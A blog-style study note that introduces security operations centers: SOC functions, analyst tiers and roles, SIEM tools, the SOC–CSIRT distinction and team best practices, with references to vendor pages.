Topic: Become a SOC Analyst
Date:31.03.22
Day: 01
We are learning to,
Introduction to SOC
SOC Types and Roles
SOC Analysts and Their Responsibilities
SIEM and Analyst Relationship
Table contents :
Introduction to SOC
What Is a Security Operations Center (SOC)?
What is the importance of a SOC?
What does a SOC do?
What does a SOC do when it’s not detecting threats?
Who works in a SOC?
What are best practices for building a SOC?
Security information and event management (SIEM)
What services are included in a SIEM application?
Automated application security
Asset discovery system
Vulnerability scanners and penetration testing
Ethical hacking
Reverse engineering
Consider all your options
How can SIEM improve your SOC?
What is a SOC team?
Key roles on a SOC team.
SOC roles and responsibilities.
SOC Team vs. CSIRT – What is the Difference?
Best Practices for Building a Winning SOC Team.
Measuring SOC Teams
Conclusion
Reference
Introduction:A Security Operation Center (SOC) is a centralized function within an organization employing people, processes, and technology to continuously monitor and improve an organization's security posture while preventing, detecting, analyzing, and responding to cybersecurity incidents.
A SOC acts like the hub or central command post, taking in telemetry from across an organization's IT infrastructure, including its networks, devices, appliances, and information stores, wherever those assets reside. The proliferation of advanced threats places a premium on collecting context from diverse sources. Essentially, the SOC is the correlation point for every event logged within the organization that is being monitored. For each of these events, the SOC must decide how they will be managed and acted upon.
What Is a Security Operations Center (SOC)?
A security operations center (SOC), also called an information security operations center (ISOC), is a centralized location where an information security team monitors, detects, analyzes and responds to cybersecurity incidents, typically on a 24/7/365 basis.
The security team, which consists of both security analysts and engineers, oversees all activity on servers, databases, networks, applications, endpoint devices, websites and other systems for the sole purpose of pinpointing potential security threats and thwarting them as quickly as possible. They also monitor relevant external sources (such as threat lists) that may affect the organization’s security posture.
A SOC must not only identify threats, but analyze them, investigate the source, report on any vulnerabilities discovered and plan how to prevent similar occurrences in the future. In other words, they’re dealing with security problems in real time, while continually seeking ways to improve the organization’s security posture.
On a larger scale, there are also Global Security Operations Centers (GSOC), coordinating security offices that literally span the globe. If you have offices around the world, a GSOC (rather than establishing a SOC for each international location) can prevent each location from repeating tasks and functions, reduce overhead and ensure that the security team has a big-picture view of what’s happening across the entire organization.
Below, we’ll cover the basic functions of a SOC or GSOC, in addition to key aspects of establishing a SOC.
What is the importance of a SOC?
Cyber attacks are increasingly damaging to organizations. In 2018, billions of people were affected by data breaches and cyber attacks, and consumer confidence in organizations’ ability to protect their privacy and personal information continued to erode. Nearly 70 percent of consumers believe organizations are vulnerable to hacking and cyber attacks, and say they are less likely to continue or start doing business with organizations that have been compromised.
Simply put, SOCs offer assurance that threats will be detected and prevented in real time. Looking at a big-picture perspective, SOCs can:
Respond faster: The SOC provides a centralized, complete, real-time view of how the entire infrastructure is performing from a security standpoint, even if you have several locations and thousands of endpoints. You can detect, identify, prevent and resolve issues before they cause too much trouble for the business.
Protect consumer and customer trust: Consumers are already skeptical of most companies and are worried about their privacy. Creating a SOC to protect consumer and customer data can help build trust in your organization. And of course, preventing breaches protects that trust.
Minimize costs: While many organizations think establishing a SOC is cost prohibitive, the cost associated with a breach — including the loss of data, corrupted data or customer defection — are much higher. Additionally, SOC personnel will ensure that you’re using the right tools for your business to their full potential, so you won’t waste money on ineffective tools.
These benefits are hard to put a price on because they quite literally keep your business running. But do you absolutely need a SOC? If you’re subject to government or industry regulations, have suffered a security breach or are in the business of storing sensitive data — like customer information — the answer is yes.
What does a SOC do?
The SOC leads real-time incident response and drives ongoing security improvements to protect the organization from cyber threats. By using a complex combination of the right tools and the right people to monitor and manage the entire network, a high-functioning SOC will provide:
Proactive, around-the-clock surveillance of networks, hardware and software for threat and breach detection, and incident response.
Expertise on all the tools your organization uses, including third-party vendors, to ensure they can easily resolve security issues.
Installation, updating and troubleshooting of application software.
Monitoring and managing of firewall and intrusion prevention systems.
Scanning and remediation of antivirus, malware and ransomware solutions.
Email, voice and video traffic management.
Patch management and whitelisting.
Deep analysis of security log data from various sources.
Analysis, investigation and documentation of security trends.
Investigation of security breaches to understand the root cause of attacks and prevent future breaches.
Enforcement of security policies and procedures.
Backup, storage and recovery.
The SOC uses a range of tools that collect data from across the network and various devices, monitors for anomalies and alerts staff of potential threats. However, the SOC does more than just handle problems as they pop up.
What does a SOC do when it’s not detecting threats?
The SOC is tasked with finding weaknesses — both outside and within the organization — through ongoing software and hardware vulnerability analysis, as well as actively gathering threat intelligence on known risks. So even when there are seemingly no active threats (which may be rare, given that hacker attacks happen about every 39 seconds), SOC staff are proactively looking at ways to improve security. Vulnerability assessment includes actively trying to hack their own system to find weaknesses, which is known as penetration testing. Additionally, a core role of SOC personnel is security analysis: ensuring that the organization is using the correct security tools, optimally, and assessing what is and isn’t working.
Who works in a SOC?
The SOC is made up of highly skilled security analysts and engineers, along with supervisors who ensure everything is running smoothly. These are professionals trained specifically to monitor and manage security threats. Not only are they skilled in using a variety of security tools, they know specific processes to follow in the event that the infrastructure is breached.
Most SOCs adopt a hierarchical approach to manage security issues, where analysts and engineers are categorized based on their skill set and experience. A typical team might be structured something like this:
Level 1 :The first line of incident responders. These security professionals watch for alerts and determine each alert’s urgency as well as when to move it up to Level 2.
Level 1 personnel may also manage security tools and run regular reports.
Level 2 :These personnel usually have more expertise, so they can quickly get to the root of the problem and assess which part of the infrastructure is under attack. They will follow procedures to remediate the problem and repair any fallout, as well as flag issues for additional investigation.
Level 3. At this level, personnel consist of high-level expert security analysts who are actively searching for vulnerabilities within the network. They will use advanced threat detection tools to diagnose weaknesses and make recommendations for improving the organization’s overall security. Within this group, you might also find specialists, such as forensic investigators, compliance auditors or cybersecurity analysts.
Level 4: This level consists of high-level managers and chief officers with the most years of experience. This group oversees all SOC team activities and is responsible for hiring and training, plus evaluating individual and overall performance. Level 4s step in during crises, and, specifically, serve as the liaison between the SOC team and the rest of the organization. They are also responsible for ensuring compliance with organization, industry and government regulations.
What Is the difference between a SOC and a NOC?
While the SOC is focused on monitoring, detecting and analyzing an organization’s security health 24/7/365, the main objective of the NOC, or network operations center, is to ensure that the network performance and speed are up to par and that downtime is limited.
SOC engineers and analysts search for cyberthreats and attempted attacks, and respond before an organization’s data or systems are compromised. NOC personnel search for any issues that could slow network speed or cause downtime. Both proactively monitor in real-time, with the goal of preventing problems before customers or employees are affected, and search for ways to make continual improvements so that similar issues don’t crop up again.
SOCs and NOCs should collaborate to work through major incidents and resolve crisis situations, and in some cases the SOC functions will be housed within the NOC. NOCs can detect and respond to some security threats, specifically as they pertain to network performance, if the team is properly trained and looking for those threats. A typical SOC wouldn’t have the capability to detect and respond to network performance issues without investing in different tools and skill sets.
What are best practices for building a SOC?
Best practices for running a SOC include: developing a strategy, getting organization-wide visibility, investing in the right tools, hiring and training the right staff, maximizing efficiency and designing your SOC according to your specific needs and risks.
Develop a strategy: A SOC is an important investment; there’s a lot riding on your security planning. To create a strategy that covers your security needs, consider the following:
What do you need to secure? A single on-premises network, or global? Cloud or hybrid? How many endpoints? Are you protecting highly confidential data or consumer information? What data is most valuable, and most likely to be targeted?
Will you merge your SOC with your NOC or create two separate departments? Again, the capabilities are very different, and merging them requires different tools and personnel skills.
Do you need 24/7/365 availability from your SOC staff? This affects staffing, cost and logistics.
Will you build the SOC entirely in-house, or outsource some or all functions to a third-party vendor? A careful cost-benefit analysis will help define the trade-offs.
Make sure you have visibility across your entire organization: It’s imperative that your SOC has access to everything, no matter how small or seemingly insignificant, that could impact security. In addition to the larger infrastructure, that includes device endpoints, systems controlled by third parties and encrypted data.
Invest in the right tools and services: As you think about building your SOC, focus first on the tools. The sheer number of security events will be overwhelming without the right automated tools to deal with the “noise” and subsequently elevate significant threats. Specifically, you need to invest in:
Security information and event management (SIEM):
This single security management system offers full visibility into activity within your network, collecting, parsing and categorizing machine data from a wide range of sources on the network and analyzing that data so you can act on it in real time.
Endpoint protection systems: Every device that connects to your network is vulnerable to attack. An endpoint security tool protects your network when said devices access it.
Firewall: It will monitor incoming and outgoing network traffic and automatically block traffic based on security rules you establish.
Automated application security: Automates the testing process across all software and provides the security team with real-time feedback about vulnerabilities.
Asset discovery system: Tracks the active and inactive tools, devices and software being used on your network so you can evaluate risk and address weaknesses.
Data monitoring tool: Allows you to track and evaluate data to ensure its security and integrity.
Governance, risk and compliance (GRC) system: Helps you to ensure you’re compliant with various rules and regulations where and when you need to be.
Vulnerability scanners and penetration testing: Lets your security analysts search for vulnerabilities and find undiscovered weaknesses within your network.
Log management system: Allows you to log all those messages that come from every piece of software, hardware and endpoint device running on your network.
Hire the best and train them well: Hiring talented staff and continually improving their skills is central to success. The market for security talent is competitive. Once you get people hired, continually invest in training to improve their skills; this not only enhances security, it improves engagement and retention. Your team must understand application and network security, firewalls, information assurance, Linux, UNIX, SIEM, and security engineering and architecture. Your highest-level security analysts should possess these skills:
Ethical hacking: You want one of your people actively trying to hack your system to uncover vulnerabilities within your system.
Cyber forensics: Analysts must investigate issues and apply analysis techniques to both understand and preserve evidence from the investigations. If a case were to go to court, the security analyst must be able to provide a documented chain of evidence to show what occurred and why.
Reverse engineering: This is the process of deconstructing software or rebuilding it to understand how it works and, more importantly, where it’s vulnerable to attacks so that the team can take preventive measures.
Intrusion prevention system expertise: Monitoring network traffic for threats would be impossible without tools. Your SOCs need to know the ins and outs of how to use them properly.
Consider all your options: The most common types of SOC include:
Internal SOCs, usually with a full-time staff based on-premises. The internal SOC comprises a physical room where all the action takes place.
Virtual SOCs are not on-premises, and are made up of part-time or contracted workers who work together in a coordinated manner to resolve issues as needed. The SOC and the organization set parameters and guidelines for how the relationship will work, and how much support the SOC offers can vary depending on the needs of the organization.
Outsourced SOCs, in which some or all functions are managed by an external managed security service provider (MSSP) that specializes in security analysis and response. Sometimes these companies provide specific services to support an internal SOC, and sometimes they handle everything .
What services are included in a SIEM application?
Because a SIEM gives analysts an overview of network traffic, it can be used in various fields. It’s mainly used in the cybersecurity industry, where dedicated analysts work in a NOC to review real-time traffic. It can also be used for other industries such as data science, forensics, or log management.
A SIEM can be used for:
Data security
Mobile security
Cloud security
IoT security
Endpoint monitoring and security
Infrastructure security
Application security
Messaging security
Web security
Risk and compliance
Threat intelligence
Specialized threat analysis and prediction
Security operations
Identity and access management
How can SIEM improve your SOC?
SIEM makes the SOC more effective at securing your organization. Top security analysts — even those with the most advanced setups — can’t review the endless stream of data line by line to discover malicious activities, and that’s where SIEM can be a game changer.
As we’ve mentioned, a SIEM collects and organizes all the data coming from various sources within your network and offers your SOC team insights so that they can quickly detect and respond to internal and external attacks, simplify threat management, minimize risk, and gain organization-wide visibility and security intelligence.
SIEM is critical for SOC tasks, such as monitoring, incident response, log management, compliance reporting and policy enforcement. Its log management capabilities alone make it a necessary tool for any SOC. SIEM can parse through huge batches of security data coming from thousands of sources — in mere seconds — to find unusual behavior and malicious activity and stop it automatically. Much of that activity goes undetected without the SIEM.
The SIEM helps the SOC pull the logs together and make rules that enable automation and can drastically reduce false alerts. Security analysts are freed up to focus their attention on the real threats. Additionally, the SIEM can offer robust reporting that helps with both forensic investigations and compliance requirements.
Security Operations Center Roles and Responsibilities
In simple terms, the role of the SOC is to protect the IT infrastructure and the data on it.Achieving that is, however, a lot easier to say than to do, and in order to achieve it, we need to first consider the role of the SOC in more detail, then the people in the SOC and finally the process and procedures that are needed for a SOC to function properly.
As we will discuss later, the exact roles and responsibilities will be determined by the size of the organization involved. However, most SOCs hold the following key responsibilities
What is a SOC team?
A security operations center — commonly referred to as a SOC — is a team that continuously monitors and analyzes the security procedures of an organization. It also defends against security breaches and actively isolates and mitigates security risks.
There are five key roles on a SOC team:
01.Security analysts are cybersecurity first responders. They report on cyberthreats and implement any changes needed to protect the organization. They’re considered the last line of defense against cybersecurity threats, work alongside security managers and cybersecurity engineers, and usually, report to the CISO..
02.Security engineers are usually software or hardware specialists and are in charge of maintaining and updating tools and systems. They are also responsible for any documentation that other team members might need, such as digital security protocols.
03.The SOC manager is responsible for the SOC team. They direct SOC operations and are responsible for syncing between analysts and engineers; hiring; training; and creating and executing cybersecurity strategy. They also direct and orchestrate the company’s response to major security threats.
04.The chief information security officer (CISO) is a leadership position responsible for establishing security-related strategies, policies, and operations. They work closely with the CEO and inform and report to management on security issues.
05.The director of incident response (IR) is a role in larger security organizations that is responsible for managing incidents as they occur, and communicating security requirements to the organization in the case of a significant data breach.
SOC roles and responsibilities
SOC analysts are organized into four tiers. First, SIEM alerts flow to Tier 1 analysts who monitor, prioritize and investigate them. Real threats are passed to a Tier 2 analyst with deeper security experience, who conducts further analysis and decides on a strategy for containment.
Critical breaches are moved up to a Tier 3 senior analyst, who manages the incident and is responsible for actively hunting for threats continuously. The Tier 4 analyst is the SOC manager, responsible for recruitment, strategy, priorities, and the direct management of SOC staff when major security incidents occur.
Figure :SOC roles and responsibilities
The table below explains each SOC role in more detail.
SOC Team vs. CSIRT – What is the Difference?
A computer security incident response team (CSIRT), also called CERT or CIRT, is responsible for receiving, analyzing, and responding to security incidents. CSIRTs can work under SOCs or can stand alone.
What differentiates a CSIRT from a SOC?
While the core function of a CSIRT is to minimize and manage damage caused by an incident, the CSIRT does not just deal with the attack itself; they also communicate with clients, executives, and the board.
How to determine whether you need a SOC team, CSIRT, or both?
The case for a single entity
Often, it’s desirable to have a single entity that unites the SOC and CSIRT. Why? Because the distinction between detection and response is not clear cut, and may even become irrelevant. For example, threat hunting is used to identify threats, but also operates as a method of response.
Both SOC teams and CSIRTsuse security orchestration, automation and response (SOAR) tools, which could indicate that these teams need to be merged, as it is not always clear who owns the tool and is accountable for its evolution. Threat intelligence (TI) related activities also provide a case for having a single entity. A single TI consumption position can offer insights into identification and response methods.
Another reason to unite these groups is related to managing the workforce. One problem with SOCs is that it is difficult to keep Tier 1 analysts motivated, particularly when they work nights and weekends. By bringing incident response and threat hunting together, you create the option for job rotation.
The case for separate entities
Some industry experts argue that keeping SOC teams and CSIRT separate allows them to concentrate on their core objectives, namely detection vs. response. Also, occasionally multiple SOCs are required because of multiple regional offices or subsidiaries, yet organizations wish to keep incident response centralized due to the sensitivity of investigation results.
Strategic plans for outsourcing may demand the separation of these two functions. Today, this may not be an issue, as many SOCs operate as hybrid organizations. However, keeping SOC and CSIRT separate may help an organization clearly define the responsibilities of a partner.
Best Practices for Building a Winning SOC Team
Security operations teams face many challenges: they can be overworked, understaffed, and often gain little attention from upper management. Security operations best practices can give companies the tools they need to protect themselves and offer SOC teams a better working environment.
Efficient SOCs use security automation – By using highly-skilled security analysts alongwith security automation, organizations can analyze more security events, identify more incidents, and protect against those incidents more effectively.
Use effective technology – The abilities of your SOC are dependent on its technology capabilities. Technology should collect and aggregate data, prevent threats, and respond as the threats occur. A team that is equipped with tools and data sources that reduce false positives to a minimum can maximize the time analysts spend investigating real security incidents. Learn more in our detailed guide about the SOC, SIEM, and other tools used in a modern SOC.
Be up to date with current threat intelligence – Threat intelligence data from within the organization, in conjunction with information from external sources, provides insight into vulnerabilities and threats to the SOC team. External cyber intelligence includes signature updates, news feeds, incident reports, vulnerability alerts, and threat briefs. SOC staff can leverage SOC monitoring tools that provide integrated threat intelligence.
People and responsibilities – Organizations often share administrative duties across subsidiaries, and between partner organizations and business units. The organization’s security policy standards should be used to define responsibilities in relation to tasks and accountability for response. An organization can also define the role of each business unit or agency in relation to the SOC.
Defend the perimeter – A key responsibility of a SOC team is to defend the perimeter, but what information are analysts required to gather? Where can they find that information?
The SOC team can take into account all data input, for example:
Network information, such as URLs, hashes, and connection details
The monitoring of endpoints, vulnerability information revealed by scanners, security intelligence feeds, intrusion prevention (IPS), and detection (IDS) systems
Operating systems
Topology information
External-facing firewall and antivirus
Measuring SOC Teams
Organizations need to measure the performance of SOC teams to continuously improve their processes. Here are a few important metrics that can help demonstrate the scale of activity in the SOC, and how effectively analysts are handling the workload.
Conclusion: Demand for SOC reports should increase in the coming years because of continued growth in outsourcing. As we continue to outsource or consume technology as a service, obtaining and understanding the appropriate SOC report to help manage your IT risk is essential. To learn more, click here. As outsourcing grows, so do opportunities to conduct SOC assessments of service providers. This line of work can provide a fresh flow of revenue for accounting firms. CPAs are perfectly positioned to be the premier providers of SOC services in this space.
Reference:
[1] Splunk Blog <https://www.splunk.com/en_us/data-insider/what-is-a-security-operations-center.html> available,last access 31/03/2022
[2] Mcafee <https://www.mcafee.com/enterprise/en-us/security-awareness/operations/what-is-soc.html> available,last access 31/03/2022
[3]Exabeam <https://www.exabeam.com/security-operations-center/security-operations-center-roles-and-responsibilities/> available,last access 31/03/2022
Comments
Post a Comment